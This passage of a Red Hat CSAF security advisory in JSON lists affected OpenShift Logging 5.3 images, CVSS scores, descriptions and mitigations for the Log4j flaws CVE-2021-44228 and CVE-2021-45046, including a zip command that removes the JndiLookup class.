"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5129"
},
{
"category": "workaround",
"details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441",
"product_ids": [
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2021-12-10T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Moderate"
}
],
"title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value"
},
{
"cve": "CVE-2021-45046",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-12-14T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2032580"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.16.0. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input using a JNDI Lookup pattern resulting in remote code execution (RCE) in a limited number of environments.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Although we have matched Apache\u0027s CVSS score, with the exception of the scope metric which will remain unaltered at \"unchanged\"; as we believe code execution would be at the permission levels of the running JVM and not exceeding that of the original CVE-2021-44228 flaw.\n \nWe have given this vulnerability an impact rating of Moderate, this is because of the unlikely nature of log4j lookup mapping values being derived from attacker controlled values. This is not the default configuration for end-applications using log4j 2.x and would require explicit action from a privileged user (a developer or administrator) to access the vulnerability. \nIn certain non-default configurations, it was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was insufficient.\n\nThis issue affects the log4j version between 2.0 and 2.15. Log4j 1.x is NOT impacted by this vulnerability. \n\nPrerequisites to exploit this flaw are :\n\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n- Log4j configuration file should be explicitly configured to use a non-default Pattern Layout with a Context Lookup eg. ($${ctx:loginId}) \n\nIn most cases, the mitigation suggested for CVE-2021-44228 (i.e. to set the system property `log4j2.noFormatMsgLookup` to `true) does NOT mitigate this specific vulnerability. \nLog4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n\nFor Elasticsearch, as shipped in OpenShift 3.11, the \"log4j2.formatMsgNoLookups=true\" system property mitigation is sufficient as there are no included non-standard configurations that allow for exploitation:\n\nhttps://github.com/openshift/openshift-ansible/blob/release-3.11/roles/openshift_logging_elasticsearch/templates/log4j2.properties.j2\n\nhttps://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476\n\nFor CodeReady Studio the fix for this flaw is available on CodeReady Studio 12.21.3 and above versions.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le"
],
"known_not_affected": [
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-45046"
},
{
"category": "external",
"summary": "RHBZ#2032580",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-45046",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-45046"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2021-44228",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.openwall.com/lists/oss-security/2021/12/14/4",
"url": "https://www.openwall.com/lists/oss-security/2021/12/14/4"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-14T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T19:37:00+00:00",
"details": "For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html\n\nFor Red Hat OpenShift Logging 5.3, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html",
"product_ids": [
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5129"
},
{
"category": "workaround",
"details": "For Log4j versions up to and including 2.15.0, this issue can be mitigated by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).",
"product_ids": [
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64",
